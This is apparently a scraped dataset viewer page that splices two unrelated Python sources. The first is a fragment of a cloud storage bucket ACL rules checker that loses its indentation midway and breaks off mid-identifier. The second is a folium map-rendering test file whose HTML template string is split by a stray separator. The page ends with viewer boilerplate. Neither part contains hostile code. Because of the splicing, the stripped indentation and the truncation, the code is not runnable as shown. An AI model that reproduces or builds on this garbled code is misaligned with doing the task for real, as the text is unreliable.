            rule_index: The index of the rule from the rule definitions.
                Assigned automatically when the rule book is built.

        Raises:
            InvalidRulesSchemaError: if resource ids are missing or any of
                the bucket/entity/email/domain/role fields is absent.
        """
        resources = rule_def.get('resource')

        for resource in resources:
            resource_ids = resource.get('resource_ids')

            if not resource_ids or len(resource_ids) < 1:
                raise audit_errors.InvalidRulesSchemaError(
                    'Missing resource ids in rule {}'.format(rule_index))

            bucket = rule_def.get('bucket')
            entity = rule_def.get('entity')
            email = rule_def.get('email')
            domain = rule_def.get('domain')
            role = rule_def.get('role')

            if (bucket is None) or (entity is None) or (email is None) or\
               (domain is None) or (role is None):
                raise audit_errors.InvalidRulesSchemaError(
                    'Faulty rule {}'.format(rule_def.get('name')))

            # Convert the glob patterns into anchored regexes that are later
            # matched against each bucket ACL.
            rule_def_resource = bkt_acls.BucketAccessControls(
                escape_and_globify(bucket),
                escape_and_globify(entity),
                escape_and_globify(email),
                escape_and_globify(domain),
                escape_and_globify(role.upper()))

            rule = Rule(rule_name=rule_def.get('name'),
                        rule_index=rule_index,
                        rules=rule_def_resource)

            # First rule for a given index wins; duplicates are ignored.
            resource_rules = self.resource_rules_map.get(rule_index)

            if not resource_rules:
                self.resource_rules_map[rule_index] = rule

    def get_resource_rules(self):
        """Get all the resource rules for (resource, RuleAppliesTo.*).

        Returns:
            A list of Rule objects, one per parsed rule.
        """
        resource_rules = []

        for resource_rule in self.resource_rules_map:
            resource_rules.append(self.resource_rules_map[resource_rule])

        return resource_rules
class Rule(object):
"""Rule properties from the rule definition file.
Also finds violations.
"""
def __init__(self, rule_name, rule_index, rules):
"""Initialize.
Args:
rule_name: Name of the loaded rule
rule_index: The index of the rule from the rule definitions
rules: The rules from the file
"""
self.rule_name = rule_name
self.rule_index = rule_index
self.rules = rules
def find_policy_violations(self, bucket_acl):
"""Find bucket policy acl violations in the rule book.
Args:
bucket_acl: Bucket ACL resource
Returns:
Returns RuleViolation named tuple
"""
if self.rules.bucket != '^.+$':
bucket_bool = re.match(self.rules.bucket, bucket_acl.bucket)
else:
bucket_bool = True
if self.rules.entity != '^.+$':
entity_bool = re.match(self.rules.entity, bucket_acl.entity)
else:
entity_bool = True
if self.rules.email != '^.+$':
email_bool = re.match(self.rules.email, bucket_acl.email)
else:
email_bool = True
if self.rules.domain != '^.+$':
domain_bool = re.match(self.rules.domain, bucket_acl.domain)
else:
domain_bool = True
if self.rules.role != '^.+$':
role_bool = re.match(self.rules.role, bucket_acl.role)
else:
role_bool = True
should_raise_violation = (
(bucket_bool is not None and bucket_bool) and
(entity_bool is not None and entity_bool) and
(email_bool is not None and email_bool) and
(domain_bool is not None and domain_bool) and
(role_bool is not None and role_bool))
if should_raise_violation:
yield self.RuleViolation(
resource_type='project',
resource_id=bucket_acl.project_number,
rule_name=self.rule_name,
rule_index=self.rule_index,
violation_type='BUCKET_VIOLATION',
role=bucket_acl.role,
entity=bucket_acl.entity,
email=bucket_acl.em
|
talespaiva/folium
|
tests/test_features.py
|
Python
|
mit
| 3,684
| 0.000272
|
# -*- coding: utf-8 -*-
""""
Folium Features Tests
---------------------
"""
import os
from branca.six import text_type
from branca.element import Element
from folium import Map, Popup
from folium import features
tmpl = """
<!DOCTYPE html>
<head>
<meta
|
http-equiv="content-type" content="text/html; charset=UTF-8" />
</head>
<body>
</body>
<script>
</script>
""" # noqa
# Figure
def test_figure_creation():
    # A bare Figure is a branca Element with no bounds yet.
    f = features.Figure()
    assert isinstance(f, Element)

    bounds = f.get_bounds()
    assert bounds == [[None, None], [None, None]], bounds


def test_figure_rendering():
    # render() must return text and leave the (empty) bounds untouched.
    f = features.Figure()
    out = f.render()
    assert type(out) is text_type

    bounds = f.get_bounds()
    assert bounds == [[None, None], [None, None]], bounds


def test_figure_html():
    # An empty Figure renders exactly the bare skeleton in `tmpl`
    # (per-line whitespace stripped before comparison).
    f = features.Figure()
    out = f.render()
    out = os.linesep.join([s.strip() for s in out.splitlines() if s.strip()])
    print(out)
    assert out.strip() == tmpl.strip(), '\n'+out.strip()+'\n'+'-'*80+'\n'+tmpl.strip()

    bounds = f.get_bounds()
    assert bounds == [[None, None], [None, None]], bounds


def test_figure_double_rendering():
    # Rendering twice must be idempotent.
    f = features.Figure()
    out = f.render()
    out2 = f.render()
    assert out == out2

    bounds = f.get_bounds()
    assert bounds == [[None, None], [None, None]], bounds
def test_marker_popups():
    # Every marker type must accept both a plain string and a Popup object,
    # and the map bounds must cover all added markers.
    m = Map()
    features.Marker([45, -180], popup='-180').add_to(m)
    features.Marker([45, -120], popup=Popup('-120')).add_to(m)
    features.RegularPolygonMarker([45, -60], popup='-60').add_to(m)
    features.RegularPolygonMarker([45, 0], popup=Popup('0')).add_to(m)
    features.CircleMarker([45, 60], popup='60').add_to(m)
    features.CircleMarker([45, 120], popup=Popup('120')).add_to(m)
    m._repr_html_()

    bounds = m.get_bounds()
    assert bounds == [[45, -180], [45, 120]], bounds


def test_polyline_popups():
    # PolyLine / MultiPolyLine popups, in both string and Popup flavours.
    m = Map([43, -100], zoom_start=4)
    features.PolyLine([[40, -80], [45, -80]], popup="PolyLine").add_to(m)
    features.PolyLine([[40, -90], [45, -90]],
                      popup=Popup("PolyLine")).add_to(m)
    features.MultiPolyLine([[[40, -110], [45, -110]]],
                           popup="MultiPolyLine").add_to(m)
    features.MultiPolyLine([[[40, -120], [45, -120]]],
                           popup=Popup("MultiPolyLine")).add_to(m)
    m._repr_html_()

    bounds = m.get_bounds()
    assert bounds == [[40, -120], [45, -80]], bounds
# DivIcon.
def test_divicon():
    # DivIcon keeps the raw HTML and defaults className to 'empty'.
    html = """<svg height="100" width="100">
<circle cx="50" cy="50" r="40" stroke="black" stroke-width="3" fill="red" />
</svg>"""  # noqa
    div = features.DivIcon(html=html)
    assert isinstance(div, Element)
    assert div.className == 'empty'
    assert div.html == html


# WmsTileLayer.
def test_wms_service():
    # A WMS layer renders without touching the map bounds.
    m = Map([40, -100], zoom_start=4)
    url = 'http://mesonet.agron.iastate.edu/cgi-bin/wms/nexrad/n0r.cgi'
    w = features.WmsTileLayer(url,
                              name='test',
                              format='image/png',
                              layers='nexrad-n0r-900913',
                              attr=u"Weather data © 2012 IEM Nexrad",
                              transparent=True)
    w.add_to(m)
    m._repr_html_()

    bounds = m.get_bounds()
    assert bounds == [[None, None], [None, None]], bounds


# ColorLine.
def test_color_line():
    # Smoke-test ColorLine construction and rendering.
    m = Map([22.5, 22.5], zoom_start=3)
    color_line = features.ColorLine(
        [[0, 0], [0, 45], [45, 45], [45, 0], [0, 0]],
        [0, 1, 2, 3],
        colormap=['b', 'g', 'y', 'r'],
        nb_steps=4,
        weight=10,
        opacity=1)
    m.add_child(color_line)
    m._repr_html_()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.